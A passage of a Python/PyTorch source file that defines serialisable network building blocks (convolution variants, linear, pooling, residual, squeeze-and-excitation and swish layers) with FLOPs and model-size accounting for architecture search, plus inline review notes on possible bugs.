    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=kernel_size, stride=stride, groups=16,
                         copy_from=copy_from, no_create=no_create, **kwargs)
class ConvKXG32(ConvKX):
    """ConvKX specialized to a grouped convolution with 32 groups."""
    def __init__(self, in_channels=None, out_channels=None, kernel_size=None, stride=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=kernel_size, stride=stride, groups=32,
                         copy_from=copy_from, no_create=no_create, **kwargs)
class Flatten(PlainNetBasicBlockClass):
    """Flattens activations after the batch dimension; channel count is passed through."""
    def __init__(self, out_channels, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.in_channels = out_channels
        self.out_channels = out_channels
        self.no_create = no_create
    def forward(self, input_):
        # keep dim 0 (batch), collapse the rest
        return torch.flatten(input_, 1)
    def __str__(self):
        return f'Flatten({self.out_channels})'
    def __repr__(self):
        return f'Flatten({self.block_name}|{self.out_channels})'
    def get_output_resolution(self, input_resolution):
        # spatial resolution collapses to 1 after flattening
        return 1
    def get_FLOPs(self, input_resolution):
        return 0
    def get_model_size(self):
        return 0
    def set_in_channels(self, channels):
        self.in_channels = channels
        self.out_channels = channels
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``Flatten([name|]channels)``; return (block, remaining string)."""
        assert Flatten.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('Flatten('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        return Flatten(out_channels=int(param_str), no_create=no_create,
                       block_name=block_name), struct_str[idx + 1:]
class Linear(PlainNetBasicBlockClass):
    """Fully-connected block wrapping ``nn.Linear``.

    Either adopts an existing ``nn.Linear`` via ``copy_from`` or builds one from
    ``in_channels``/``out_channels``.  ``no_create`` skips module creation so the
    block can serve for FLOPs/size accounting only.
    """
    def __init__(self, in_channels=None, out_channels=None, bias=True, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is not None:
            assert isinstance(copy_from, nn.Linear)
            # nn.Linear weight is (out_features, in_features)
            self.in_channels = copy_from.weight.shape[1]
            self.out_channels = copy_from.weight.shape[0]
            self.use_bias = copy_from.bias is not None
            assert in_channels is None or in_channels == self.in_channels
            assert out_channels is None or out_channels == self.out_channels
            self.netblock = copy_from
        else:
            self.in_channels = in_channels
            self.out_channels = out_channels
            self.use_bias = bias
            if not no_create:
                self.netblock = nn.Linear(self.in_channels, self.out_channels,
                                          bias=self.use_bias)
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        return f'Linear({self.in_channels},{self.out_channels},{int(self.use_bias)})'
    def __repr__(self):
        return f'Linear({self.block_name}|{self.in_channels},{self.out_channels},{int(self.use_bias)})'
    def get_output_resolution(self, input_resolution):
        # Linear blocks operate on flattened features, i.e. resolution 1
        assert input_resolution == 1
        return 1
    def get_FLOPs(self, input_resolution):
        # multiply-accumulates of the weight matrix (bias adds ignored by convention)
        return self.in_channels * self.out_channels
    def get_model_size(self):
        # bug fix: the bias vector holds out_channels parameters; the original
        # counted the whole bias as a single parameter
        return self.in_channels * self.out_channels + self.out_channels * int(self.use_bias)
    def set_in_channels(self, channels):
        """Change the input feature count and rebuild the layer accordingly."""
        self.in_channels = channels
        if not self.no_create:
            self.netblock = nn.Linear(self.in_channels, self.out_channels,
                                      bias=self.use_bias)
            self.netblock.train()
            self.netblock.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``Linear([name|]in,out,use_bias)``; return (block, rest)."""
        assert Linear.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('Linear('):idx]
        # an optional "name|" prefix carries the block name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        split_str = param_str.split(',')
        in_channels = int(split_str[0])
        out_channels = int(split_str[1])
        use_bias = int(split_str[2])
        return Linear(in_channels=in_channels, out_channels=out_channels, bias=use_bias == 1,
                      block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
class MaxPool(PlainNetBasicBlockClass):
    """Max-pooling block; channel count passes through unchanged."""
    def __init__(self, out_channels, kernel_size, stride, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.in_channels = out_channels
        self.out_channels = out_channels
        self.kernel_size = kernel_size
        self.stride = stride
        # "same"-style padding for odd kernel sizes
        self.padding = (kernel_size - 1) // 2
        self.no_create = no_create
        if no_create:
            return
        self.netblock = nn.MaxPool2d(kernel_size=self.kernel_size, stride=self.stride, padding=self.padding)
    def forward(self, input_):
        return self.netblock(input_)
    def __str__(self):
        return f'MaxPool({self.out_channels},{self.kernel_size},{self.stride})'
    def __repr__(self):
        return f'MaxPool({self.block_name}|{self.out_channels},{self.kernel_size},{self.stride})'
    def get_output_resolution(self, input_resolution):
        return input_resolution // self.stride
    def get_FLOPs(self, input_resolution):
        # pooling is counted as free in this accounting scheme
        return 0
    def get_model_size(self):
        return 0
    def set_in_channels(self, channels):
        """Re-target channels; the pooling module itself is channel-agnostic."""
        self.in_channels = channels
        self.out_channels = channels
        if self.no_create:
            return
        self.netblock = nn.MaxPool2d(kernel_size=self.kernel_size, stride=self.stride, padding=self.padding)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``MaxPool([name|]channels,kernel,stride)``; return (block, rest)."""
        assert MaxPool.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('MaxPool('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        fields = param_str.split(',')
        return MaxPool(out_channels=int(fields[0]), kernel_size=int(fields[1]),
                       stride=int(fields[2]), no_create=no_create,
                       block_name=block_name), struct_str[idx + 1:]
class Sequential(PlainNetBasicBlockClass):
    """Runs its sub-blocks one after another; channels and stride derive from them."""
    def __init__(self, block_list, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.block_list = block_list
        if not no_create:
            self.module_list = nn.ModuleList(block_list)
        self.in_channels = block_list[0].in_channels
        self.out_channels = block_list[-1].out_channels
        self.no_create = no_create
        # overall stride measured at a reference input resolution of 1024
        self.stride = 1024 // self.get_output_resolution(1024)
    def forward(self, input_):
        output = input_
        for stage in self.block_list:
            output = stage(output)
        return output
    def __str__(self):
        return 'Sequential(' + ''.join(str(stage) for stage in self.block_list) + ')'
    def __repr__(self):
        return str(self)
    def get_output_resolution(self, input_resolution):
        resolution = input_resolution
        for stage in self.block_list:
            resolution = stage.get_output_resolution(resolution)
        return resolution
    def get_FLOPs(self, input_resolution):
        # accumulate per-stage FLOPs, tracking the shrinking resolution
        resolution = input_resolution
        total = 0
        for stage in self.block_list:
            total += stage.get_FLOPs(resolution)
            resolution = stage.get_output_resolution(resolution)
        return total
    def get_model_size(self):
        return sum(stage.get_model_size() for stage in self.block_list)
    def set_in_channels(self, channels):
        """Re-target input channels; only the first stage (and a directly
        following BN) is updated — later stages are left untouched."""
        self.in_channels = channels
        if len(self.block_list) == 0:
            self.out_channels = channels
            return
        self.block_list[0].set_in_channels(channels)
        last_channels = self.block_list[0].out_channels
        if len(self.block_list) >= 2 and isinstance(self.block_list[1], BN):
            self.block_list[1].set_in_channels(last_channels)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``Sequential(...)``; consumes the whole string, returns (block, '')."""
        assert Sequential.is_instance_from_str(struct_str)
        right_paren = _get_right_parentheses_index_(struct_str)
        # NOTE(review): the extra "+ 1" skips one character after the opening
        # parenthesis — kept as-is to match the established string format.
        param_str = struct_str[len('Sequential(') + 1:right_paren]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
        assert len(remaining_s) == 0
        if the_block_list is None or len(the_block_list) == 0:
            return None, ''
        return Sequential(block_list=the_block_list, no_create=no_create, block_name=block_name), ''
class MultiSumBlock(PlainNetBasicBlockClass):
    """Parallel branches whose outputs are summed element-wise."""
    def __init__(self, block_list, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.block_list = block_list
        if not no_create:
            self.module_list = nn.ModuleList(block_list)
        # the widest branch defines the nominal channel counts
        self.in_channels = np.max([x.in_channels for x in block_list])
        self.out_channels = np.max([x.out_channels for x in block_list])
        self.no_create = no_create
        # stride inferred from the first branch at a reference resolution
        self.stride = 1024 // self.block_list[0].get_output_resolution(1024)
    def forward(self, input_):
        total = self.block_list[0](input_)
        for branch in self.block_list[1:]:
            total = total + branch(input_)
        return total
    def __str__(self):
        # branches are serialized separated by ';'
        return f'MultiSumBlock({self.block_name}|' + \
            ';'.join(str(branch) for branch in self.block_list) + ')'
    def __repr__(self):
        return str(self)
    def get_output_resolution(self, input_resolution):
        expected = self.block_list[0].get_output_resolution(input_resolution)
        # every branch must agree on the output resolution
        for branch in self.block_list:
            assert expected == branch.get_output_resolution(input_resolution)
        return expected
    def get_FLOPs(self, input_resolution):
        return sum(branch.get_FLOPs(input_resolution) for branch in self.block_list)
    def get_model_size(self):
        return sum(branch.get_model_size() for branch in self.block_list)
    def set_in_channels(self, channels):
        self.in_channels = channels
        for branch in self.block_list:
            branch.set_in_channels(channels)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``MultiSumBlock([name|]branch;branch;...)``; return (block, rest)."""
        assert MultiSumBlock.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('MultiSumBlock('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        remaining = param_str
        branches = []
        while len(remaining) > 0:
            parsed, remaining = _create_netblock_list_from_str_(remaining, no_create=no_create)
            if parsed is None:
                continue
            if len(parsed) == 1:
                branches.append(parsed[0])
            else:
                # multi-block branches are wrapped into a Sequential
                branches.append(Sequential(block_list=parsed, no_create=no_create))
        if len(branches) == 0:
            return None, struct_str[idx + 1:]
        return MultiSumBlock(block_list=branches, block_name=block_name,
                             no_create=no_create), struct_str[idx + 1:]
class MultiCatBlock(PlainNetBasicBlockClass):
    """Parallel branches whose outputs are concatenated along the channel dim."""
    def __init__(self, block_list, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.block_list = block_list
        if not no_create:
            self.module_list = nn.ModuleList(block_list)
        # widest branch defines the input width; outputs add up on concat
        self.in_channels = np.max([x.in_channels for x in block_list])
        self.out_channels = np.sum([x.out_channels for x in block_list])
        self.no_create = no_create
        # stride inferred from the first branch at a reference resolution
        self.stride = 1024 // self.block_list[0].get_output_resolution(1024)
    def forward(self, input_):
        branch_outputs = [branch(input_) for branch in self.block_list]
        return torch.cat(branch_outputs, dim=1)
    def __str__(self):
        # branches are serialized separated by ';'
        return f'MultiCatBlock({self.block_name}|' + \
            ';'.join(str(branch) for branch in self.block_list) + ')'
    def __repr__(self):
        return str(self)
    def get_output_resolution(self, input_resolution):
        """Return the (shared) output resolution of the branches."""
        expected = self.block_list[0].get_output_resolution(input_resolution)
        for branch in self.block_list:
            assert expected == branch.get_output_resolution(input_resolution)
        return expected
    def get_FLOPs(self, input_resolution):
        return sum(branch.get_FLOPs(input_resolution) for branch in self.block_list)
    def get_model_size(self):
        return sum(branch.get_model_size() for branch in self.block_list)
    def set_in_channels(self, channels):
        self.in_channels = channels
        for branch in self.block_list:
            branch.set_in_channels(channels)
        # concatenation: total output channels is the sum over branches
        self.out_channels = np.sum([x.out_channels for x in self.block_list])
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``MultiCatBlock([name|]branch;branch;...)``; return (block, rest)."""
        assert MultiCatBlock.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('MultiCatBlock('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        remaining = param_str
        branches = []
        while len(remaining) > 0:
            parsed, remaining = _create_netblock_list_from_str_(remaining, no_create=no_create)
            if parsed is None:
                continue
            if len(parsed) == 1:
                branches.append(parsed[0])
            else:
                # multi-block branches are wrapped into a Sequential
                branches.append(Sequential(block_list=parsed, no_create=no_create))
        if len(branches) == 0:
            return None, struct_str[idx + 1:]
        return MultiCatBlock(block_list=branches, block_name=block_name,
                             no_create=no_create), struct_str[idx + 1:]
class RELU(PlainNetBasicBlockClass):
    """Parameter-free ReLU activation block; channel count passes through."""
    def __init__(self, out_channels, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.in_channels = out_channels
        self.out_channels = out_channels
        self.no_create = no_create
    def forward(self, input_):
        return F.relu(input_)
    def __str__(self):
        return f'RELU({self.out_channels})'
    def __repr__(self):
        return f'RELU({self.block_name}|{self.out_channels})'
    def get_output_resolution(self, input_resolution):
        # element-wise op: resolution unchanged
        return input_resolution
    def get_FLOPs(self, input_resolution):
        return 0
    def get_model_size(self):
        return 0
    def set_in_channels(self, channels):
        self.in_channels = channels
        self.out_channels = channels
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse ``RELU([name|]channels)``; return (block, remaining string)."""
        assert RELU.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('RELU('):idx]
        sep = param_str.find('|')
        if sep < 0:
            block_name = f'uuid{uuid.uuid4().hex}'
        else:
            block_name = param_str[0:sep]
            param_str = param_str[sep + 1:]
        return RELU(out_channels=int(param_str), no_create=no_create,
                    block_name=block_name), struct_str[idx + 1:]
class ResBlock(PlainNetBasicBlockClass):
    """Residual block: output = inner_blocks(x) + shortcut(x).

    String form: ResBlock(in_channels, stride, inner_blocks_str).
    If in_channels is missing, block_list[0].in_channels is used instead.
    The shortcut is the identity unless the stride or channel count changes,
    in which case a 1x1 conv + BN projection is used.
    """
    def __init__(self, block_list, in_channels=None, stride=None, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.block_list = block_list        # inner (main-path) blocks
        self.stride = stride                # overall spatial stride; inferred below if None
        self.no_create = no_create
        if not no_create:
            # register inner blocks as submodules so parameters are tracked
            self.module_list = nn.ModuleList(block_list)
        if in_channels is None:
            # default: inherit input width from the first inner block
            self.in_channels = block_list[0].in_channels
        else:
            self.in_channels = in_channels
        self.out_channels = block_list[-1].out_channels
        if self.stride is None:
            # infer the overall stride by probing the resolution change
            tmp_input_res = 1024
            tmp_output_res = self.get_output_resolution(tmp_input_res)
            self.stride = tmp_input_res // tmp_output_res
        self.proj = None
        # projection shortcut needed when identity cannot match shape
        # NOTE(review): proj is built even when no_create=True — confirm intended
        if self.stride > 1 or self.in_channels != self.out_channels:
            self.proj = nn.Sequential(
                nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
                nn.BatchNorm2d(self.out_channels),
            )
    def forward(self, input_):
        # empty main path degenerates to the identity (no residual add)
        if len(self.block_list) == 0:
            return input_
        output = input_
        for inner_block in self.block_list:
            output = inner_block(output)
        # add the (possibly projected) shortcut
        if self.proj is not None:
            output = output + self.proj(input_)
        else:
            output = output + input_
        return output
    def __str__(self):
        # serialized form parsed back by create_from_str
        block_str = f'ResBlock({self.in_channels},{self.stride},'
        for inner_block in self.block_list:
            block_str += str(inner_block)
        block_str += ')'
        return block_str
    def __repr__(self):
        block_str = f'ResBlock({self.block_name}|{self.in_channels},{self.stride},'
        for inner_block in self.block_list:
            block_str += str(inner_block)
        block_str += ')'
        return block_str
    def get_output_resolution(self, input_resolution):
        # resolution after chaining all inner blocks
        the_res = input_resolution
        for the_block in self.block_list:
            the_res = the_block.get_output_resolution(the_res)
        return the_res
    def get_FLOPs(self, input_resolution):
        the_res = input_resolution
        the_flops = 0
        for the_block in self.block_list:
            the_flops += the_block.get_FLOPs(the_res)
            the_res = the_block.get_output_resolution(the_res)
        if self.proj is not None:
            # 1x1 conv FLOPs plus BN cost for the projection shortcut
            # NOTE(review): the_res is already the post-stride output
            # resolution; dividing by stride again may undercount — confirm.
            the_flops += self.in_channels * self.out_channels * (the_res / self.stride) ** 2 + \
                (the_res / self.stride) ** 2 * self.out_channels
        return the_flops
    def get_model_size(self):
        the_size = 0
        for the_block in self.block_list:
            the_size += the_block.get_model_size()
        if self.proj is not None:
            # 1x1 conv weights plus BN parameters of the projection
            the_size += self.in_channels * self.out_channels + self.out_channels
        return the_size
    def set_in_channels(self, channels):
        """Change the input width; only the first inner block (and a directly
        following BN) is adjusted, and the projection is rebuilt if needed.

        NOTE(review): out_channels is not recomputed here — confirm callers
        rely on the last inner block's width staying fixed.
        """
        self.in_channels = channels
        if len(self.block_list) == 0:
            self.out_channels = channels
            return
        self.block_list[0].set_in_channels(channels)
        last_channels = self.block_list[0].out_channels
        if len(self.block_list) >= 2 and \
                (isinstance(self.block_list[0], (ConvKX, ConvDW))) and isinstance(self.block_list[1], BN):
            self.block_list[1].set_in_channels(last_channels)
        self.proj = None
        if not self.no_create:
            if self.stride > 1 or self.in_channels != self.out_channels:
                self.proj = nn.Sequential(
                    nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
                    nn.BatchNorm2d(self.out_channels),
                )
                self.proj.train()
                self.proj.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse 'ResBlock([name|][in_channels,][stride,]inner_blocks)'.

        in_channels and stride are optional numeric prefixes; anything
        non-numeric is treated as the start of the inner block string.
        Returns (block, remaining_string); block is None if no inner
        blocks were parsed.
        """
        assert ResBlock.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        the_stride = None
        param_str = struct_str[len('ResBlock('):idx]
        # find block_name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        first_comma_index = param_str.find(',')
        # cannot parse in_channels, missing, use default
        if first_comma_index < 0 or not param_str[0:first_comma_index].isdigit():
            in_channels = None
            the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
        else:
            in_channels = int(param_str[0:first_comma_index])
            param_str = param_str[first_comma_index + 1:]
            second_comma_index = param_str.find(',')
            # stride is optional; only consumed when numeric
            if second_comma_index < 0 or not param_str[0:second_comma_index].isdigit():
                the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
            else:
                the_stride = int(param_str[0:second_comma_index])
                param_str = param_str[second_comma_index + 1:]
                the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
        assert len(remaining_s) == 0
        if the_block_list is None or len(the_block_list) == 0:
            return None, struct_str[idx + 1:]
        return ResBlock(block_list=the_block_list, in_channels=in_channels,
                        stride=the_stride, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class ResBlockProj(PlainNetBasicBlockClass):
    """Residual block with an ALWAYS-projected shortcut.

    String form: ResBlockProj(in_channels, stride, inner_blocks_str).
    If in_channels is missing, block_list[0].in_channels is used.
    Unlike ResBlock, the shortcut is unconditionally a 1x1 conv + BN
    projection, even when stride == 1 and channel counts match.
    """
    def __init__(self, block_list, in_channels=None, stride=None, no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.block_list = block_list        # inner (main-path) blocks
        self.stride = stride                # overall spatial stride; inferred below if None
        self.no_create = no_create
        if not no_create:
            # register inner blocks as submodules so parameters are tracked
            self.module_list = nn.ModuleList(block_list)
        if in_channels is None:
            # default: inherit input width from the first inner block
            self.in_channels = block_list[0].in_channels
        else:
            self.in_channels = in_channels
        self.out_channels = block_list[-1].out_channels
        if self.stride is None:
            # infer the overall stride by probing the resolution change
            tmp_input_res = 1024
            tmp_output_res = self.get_output_resolution(tmp_input_res)
            self.stride = tmp_input_res // tmp_output_res
        # projection is unconditional for this block type
        # NOTE(review): proj is built even when no_create=True — confirm intended
        self.proj = nn.Sequential(
            nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
            nn.BatchNorm2d(self.out_channels),)
    def forward(self, input_):
        # empty main path degenerates to the identity (no residual add)
        if len(self.block_list) == 0:
            return input_
        output = input_
        for inner_block in self.block_list:
            output = inner_block(output)
        # forward assumes proj is set
        # NOTE(review): set_in_channels can leave proj = None, which would
        # make this line fail — confirm that path is never hit.
        output = output + self.proj(input_)
        return output
    def __str__(self):
        # serialized form parsed back by create_from_str
        block_str = f'ResBlockProj({self.in_channels},{self.stride},'
        for inner_block in self.block_list:
            block_str += str(inner_block)
        block_str += ')'
        return block_str
    def __repr__(self):
        block_str = f'ResBlockProj({self.block_name}|{self.in_channels},{self.stride},'
        for inner_block in self.block_list:
            block_str += str(inner_block)
        block_str += ')'
        return block_str
    def get_output_resolution(self, input_resolution):
        # resolution after chaining all inner blocks
        the_res = input_resolution
        for the_block in self.block_list:
            the_res = the_block.get_output_resolution(the_res)
        return the_res
    def get_FLOPs(self, input_resolution):
        the_res = input_resolution
        the_flops = 0
        for the_block in self.block_list:
            the_flops += the_block.get_FLOPs(the_res)
            the_res = the_block.get_output_resolution(the_res)
        if self.proj is not None:
            # 1x1 conv FLOPs plus BN cost for the projection shortcut
            # NOTE(review): the_res is already the post-stride output
            # resolution; dividing by stride again may undercount — confirm.
            the_flops += self.in_channels * self.out_channels * (the_res / self.stride) ** 2 + \
                (the_res / self.stride) ** 2 * self.out_channels
        return the_flops
    def get_model_size(self):
        the_size = 0
        for the_block in self.block_list:
            the_size += the_block.get_model_size()
        if self.proj is not None:
            # 1x1 conv weights plus BN parameters of the projection
            the_size += self.in_channels * self.out_channels + self.out_channels
        return the_size
    def set_in_channels(self, channels):
        """Change the input width; only the first inner block (and a directly
        following BN) is adjusted, and the projection is rebuilt if needed.

        NOTE(review): when stride == 1 and in == out channels, proj stays
        None here although forward always applies it — confirm.
        """
        self.in_channels = channels
        if len(self.block_list) == 0:
            self.out_channels = channels
            return
        self.block_list[0].set_in_channels(channels)
        last_channels = self.block_list[0].out_channels
        if len(self.block_list) >= 2 and \
                (isinstance(self.block_list[0], (ConvKX, ConvDW))) and isinstance(self.block_list[1], BN):
            self.block_list[1].set_in_channels(last_channels)
        self.proj = None
        if not self.no_create:
            if self.stride > 1 or self.in_channels != self.out_channels:
                self.proj = nn.Sequential(
                    nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
                    nn.BatchNorm2d(self.out_channels),
                )
                self.proj.train()
                self.proj.requires_grad_(True)
    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse 'ResBlockProj([name|][in_channels,][stride,]inner_blocks)'.

        in_channels and stride are optional numeric prefixes; anything
        non-numeric is treated as the start of the inner block string.
        Returns (block, remaining_string); block is None if no inner
        blocks were parsed.
        """
        assert ResBlockProj.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        the_stride = None
        param_str = struct_str[len('ResBlockProj('):idx]
        # find block_name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        first_comma_index = param_str.find(',')
        # cannot parse in_channels, missing, use default
        if first_comma_index < 0 or not param_str[0:first_comma_index].isdigit():
            in_channels = None
            the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
        else:
            in_channels = int(param_str[0:first_comma_index])
            param_str = param_str[first_comma_index + 1:]
            second_comma_index = param_str.find(',')
            # stride is optional; only consumed when numeric
            if second_comma_index < 0 or not param_str[0:second_comma_index].isdigit():
                the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
            else:
                the_stride = int(param_str[0:second_comma_index])
                param_str = param_str[second_comma_index + 1:]
                the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
        assert len(remaining_s) == 0
        if the_block_list is None or len(the_block_list) == 0:
            return None, struct_str[idx + 1:]
        return ResBlockProj(block_list=the_block_list, in_channels=in_channels,
                            stride=the_stride, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class SE(PlainNetBasicBlockClass):
    """Squeeze-and-Excitation block: channel-wise gating via a bottleneck MLP.

    The gate is sigmoid(conv(relu(bn(conv(avgpool(x)))))) and is multiplied
    element-wise onto the input; in_channels == out_channels.
    """
    def __init__(self, out_channels=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is not None:
            raise RuntimeError('Not implemented')
        # SE is channel-preserving
        self.in_channels = out_channels
        self.out_channels = out_channels
        # bottleneck ratio of the squeeze conv
        self.se_ratio = 0.25
        self.se_channels = max(1, int(round(self.out_channels * self.se_ratio)))
        if no_create or self.out_channels == 0:
            return
        self.netblock = nn.Sequential(
            nn.AdaptiveAvgPool2d((1, 1)),
            nn.Conv2d(in_channels=self.out_channels, out_channels=self.se_channels, kernel_size=1, stride=1,
                      padding=0, bias=False),
            nn.BatchNorm2d(self.se_channels),
            nn.ReLU(),
            nn.Conv2d(in_channels=self.se_channels, out_channels=self.out_channels, kernel_size=1, stride=1,
                      padding=0, bias=False),
            nn.BatchNorm2d(self.out_channels),
            nn.Sigmoid()
        )

    def forward(self, input_):
        # per-channel attention gate, broadcast over spatial dims
        se_x = self.netblock(input_)
        return se_x * input_

    def __str__(self):
        # BUG FIX: these were plain strings without the f prefix, so
        # '{self.out_channels}' was emitted literally instead of being
        # interpolated, breaking the str()/create_from_str round-trip
        # that every other block in this file supports.
        return f'SE({self.out_channels})'

    def __repr__(self):
        return f'SE({self.block_name}|{self.out_channels})'

    def get_output_resolution(self, input_resolution):
        # gating is element-wise: spatial size unchanged
        return input_resolution

    def get_FLOPs(self, input_resolution):
        # two 1x1 convs on the pooled vector plus the final gating multiply
        return self.in_channels * self.se_channels + self.se_channels * self.out_channels + self.out_channels + \
            self.out_channels * input_resolution ** 2

    def get_model_size(self):
        # conv weights plus BN (weight + bias) parameters
        return self.in_channels * self.se_channels + 2 * self.se_channels + self.se_channels * self.out_channels + \
            2 * self.out_channels

    def set_in_channels(self, channels):
        """Set a new input-channel count and rebuild the gating network.

        NOTE(review): unlike other blocks, out_channels and se_channels are
        not updated here and the rebuilt netblock still uses
        self.out_channels — confirm callers always pass
        channels == self.out_channels.
        """
        self.in_channels = channels
        if not self.no_create:
            self.netblock = nn.Sequential(
                nn.AdaptiveAvgPool2d((1, 1)),
                nn.Conv2d(in_channels=self.out_channels, out_channels=self.se_channels, kernel_size=1, stride=1,
                          padding=0, bias=False),
                nn.BatchNorm2d(self.se_channels),
                nn.ReLU(),
                nn.Conv2d(in_channels=self.se_channels, out_channels=self.out_channels, kernel_size=1, stride=1,
                          padding=0, bias=False),
                nn.BatchNorm2d(self.out_channels),
                nn.Sigmoid()
            )
            self.netblock.train()
            self.netblock.requires_grad_(True)

    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse 'SE(<name>|<out_channels>)' and return (block, remainder)."""
        assert SE.is_instance_from_str(struct_str)
        idx = _get_right_parentheses_index_(struct_str)
        assert idx is not None
        param_str = struct_str[len('SE('):idx]
        # an optional '<name>|' prefix carries the block name
        tmp_idx = param_str.find('|')
        if tmp_idx < 0:
            tmp_block_name = f'uuid{uuid.uuid4().hex}'
        else:
            tmp_block_name = param_str[0:tmp_idx]
            param_str = param_str[tmp_idx + 1:]
        out_channels = int(param_str)
        return SE(out_channels=out_channels, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
# pylint: disable=arguments-differ,abstract-method
class SwishImplementation(torch.autograd.Function):
    """Custom autograd implementation of swish: f(x) = x * sigmoid(x)."""

    @staticmethod
    def forward(ctx, i):
        result = i * torch.sigmoid(i)
        # stash the input for the backward pass
        ctx.save_for_backward(i)
        return result

    @staticmethod
    def backward(ctx, grad_output):
        # FIX: use ctx.saved_tensors — ctx.saved_variables is the
        # long-deprecated alias and has been removed from modern PyTorch.
        i = ctx.saved_tensors[0]
        sigmoid_i = torch.sigmoid(i)
        # f'(x) = sigmoid(x) * (1 + x * (1 - sigmoid(x)))
        return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class Swish(PlainNetBasicBlockClass):
    """Swish activation layer (x * sigmoid(x)); channel-preserving."""

    def __init__(self, out_channels=None, copy_from=None,
                 no_create=False, **kwargs):
        super().__init__(**kwargs)
        self.no_create = no_create
        if copy_from is not None:
            raise RuntimeError('Not implemented')
        # element-wise activation keeps the channel count unchanged
        self.in_channels = out_channels
        self.out_channels = out_channels

    def forward(self, input_):
        return SwishImplementation.apply(input_)

    def __str__(self):
        return f'Swish({self.out_channels})'

    def __repr__(self):
        return f'Swish({self.block_name}|{self.out_channels})'

    def get_output_resolution(self, input_resolution):
        # element-wise op: spatial size unchanged
        return input_resolution

    def get_FLOPs(self, input_resolution):
        # one op per activation element in this cost model
